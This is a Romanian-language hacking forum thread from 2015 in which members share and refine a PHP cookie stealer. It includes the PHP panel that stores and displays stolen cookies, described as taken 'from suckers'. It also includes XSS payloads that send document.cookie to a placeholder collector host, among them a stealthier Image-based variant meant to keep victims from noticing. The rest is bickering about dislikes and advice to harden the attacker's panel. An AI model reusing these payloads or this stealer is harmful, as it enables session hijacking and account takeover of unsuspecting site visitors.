shadowSQLi Posted March 21, 2015 Report Posted March 21, 2015 (edited) https://rstforums.com/forum/99145-php-cookie-stealer-version.rst#post619762 Edited March 22, 2015 by shadowSQLi Quote
Sim Master Posted March 21, 2015 Report Posted March 21, 2015 De ce intr-un script folosesti mysqli si in celalalt mysql_*? Si de ce codul sql de insert are ca si valoare pentru campul ID mereu acelasi cod html? Quote
QUADMACHINE Posted March 21, 2015 Report Posted March 21, 2015 <?php//////////////////////// Cookie stealer//////////////////////*Database stuff*/define(host, ""); //localhost as usualdefine(user, ""); //root, gigel sau petricadefine(pass, ""); //parola de la userdefine(db, ""); //numele la baza de datetry { $db = new mysqli(host, user, pass, db); } catch (mysqli_sql_exception $e) { throw $e; } if(isset($_GET['act']) && ($_GET['act'] == "prune")){//Va sterge rezultate mai vechi de 30 zile. $del_oldrecords = "DELETE FROM `cookies` WHERE `Date` < DATEADD(day, -30, GETDATE())"; $db->query($del_oldrecords); $affected_rows = $db->affected_rows; print $affected_rows;}$cookie = "SELECT `ID`, `Cookie`, `IP`, `Date` FROM `cookies`";$raw = $db->query($cookie);if(!$raw)){ die('There was an error running the query [' . $db->error . ']')}$values = $raw->fetch_all(MYSQLI_ASSOC);$results = $raw->num_rows;print 'Prune data: <a href="cookie.php?act=prune">Erase old data</a>';print 'We\'ve stealed '.number_format($results).' cookies from suckers.';foreach($values as $key){ print '<tr><td>'.$key['ID'].'</td><td>'.$key['Cookie'].'</td><td>'.$key['IP'].'</td><td>'.$key['Date'].'</td></tr>';}?> Quote
askwrite Posted March 22, 2015 Report Posted March 22, 2015 De ce intr-un script folosesti mysqli si in celalalt mysql_*? Si de ce codul sql de insert are ca si valoare pentru campul ID mereu acelasi cod html?Pentru ca copy paste Quote
activated Posted March 22, 2015 Report Posted March 22, 2015 de ce pe unele site-uri cu xss merge document.location="http://sitetau.com/cookie.php?shadow=" + document.cookie; si la unele numai document.location="http://sitetau.com/cookie.php?shadow=" adica fara document.cookie? Quote
shadowSQLi Posted March 22, 2015 Author Report Posted March 22, 2015 (edited) Pentru ca copy paste de unde concluzia ca am copiat? e facut de mine doar conexiunea spre mysql am copiat-oDe ce intr-un script folosesti mysqli si in celalalt mysql_*? Si de ce codul sql de insert are ca si valoare pentru campul ID mereu acelasi cod html?Pentru ca ID e setat din phpmyadmin sa aibe autoincrement. Edited March 22, 2015 by TheTime Quote
Genius++ Posted March 22, 2015 Report Posted March 22, 2015 Face cineva un video ? + era o treaba misto sa se execute script-ul dintr-o imagine cum ar fii un smiley . Quote
shadowSQLi Posted March 22, 2015 Author Report Posted March 22, 2015 Face cineva un video ? + era o treaba misto sa se execute script-ul dintr-o imagine cum ar fii un smiley .o sa fac eu in aceasta noapte ca acum mai am de modificat la script si incerc sa fac si un design cat de cat ok Quote
askwrite Posted March 22, 2015 Report Posted March 22, 2015 Si practic ce-ai facut tu daca ai zis c-ai copiat sqlul? ah, ai stocat un get... 1 Quote
shadowSQLi Posted March 22, 2015 Author Report Posted March 22, 2015 Si practic ce-ai facut tu daca ai zis c-ai copiat sqlul? ah, ai stocat un get...11:16 AM - askwrite clicked Dislikes for this post: query SQL by shadowSQLi11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi11:14 AM - askwrite clicked Dislikes for this post: cookie stealer by shadowSQLi) Quote
QUADMACHINE Posted March 22, 2015 Report Posted March 22, 2015 Ce frustrat, da dislike la tot ce este in threadul asta.Este exact ca si un caine de curte, daca ii invadeaza cineva spatiul musca pe oricine. Quote
askwrite Posted March 22, 2015 Report Posted March 22, 2015 Ahahaha, tot eu sunt fustrat cand tu ai venit sa suferi aici pentru un dislike dat din gresesla. Butoanele de like / dislike sunt pentru a fi folosite. Quote
QUADMACHINE Posted March 22, 2015 Report Posted March 22, 2015 Si de aceea in 47 secunde am primit 8 dislikeuri de la tine, nu? Ca sufar eu pentru un dislike? Chill ganja man, am anuntat un administrator.Prepare ur anus! Quote
shadowSQLi Posted March 22, 2015 Author Report Posted March 22, 2015 (edited) Demo: Fac modificari:D Edited March 22, 2015 by shadowSQLi 1 Quote
TheTime Posted March 22, 2015 Report Posted March 22, 2015 Ma bucur sa vad cateva linii de cod, mi-ai facut duminica mai frumoasa! Ai un xss permanent in loguri, nu filtrezi deloc cookie-urile primite. Daca vrei sa folosesti pe bune scriptul, exista sanse ca altii sa incerce sa afle cine esti. Daca scriptul tau e vulnerabil, you're gonna have a bad time!Si pune o parola pentru accesarea logurilor. Quote
shadowSQLi Posted March 22, 2015 Author Report Posted March 22, 2015 Ma bucur sa vad cateva linii de cod, mi-ai facut duminica mai frumoasa! Ai un xss permanent in loguri, nu filtrezi deloc cookie-urile primite. Daca vrei sa folosesti pe bune scriptul, exista sanse ca altii sa incerce sa afle cine esti. Daca scriptul tau e vulnerabil, you're gonna have a bad time!Si pune o parola pentru accesarea logurilor.Ok, multumesc o sa ma ocup acum:D Quote
Active Members 0xStrait Posted March 22, 2015 Active Members Report Posted March 22, 2015 O idee mai buna pentru a nu redirectiona persoana de pe pagina este sa folosesti o imagine, faptul ca victima va fi redirectionata pe o pagina poate trezi suspiciuni.<script>a=new Image();a.src="http://sitetau.com/cookie.php?shadow="+document.cookie;</script> Quote
shadowSQLi Posted March 22, 2015 Author Report Posted March 22, 2015 gata..https://rstforums.com/forum/99145-php-cookie-stealer-version.rst#post619762 @0xStraitAm postat vectorul tau Quote
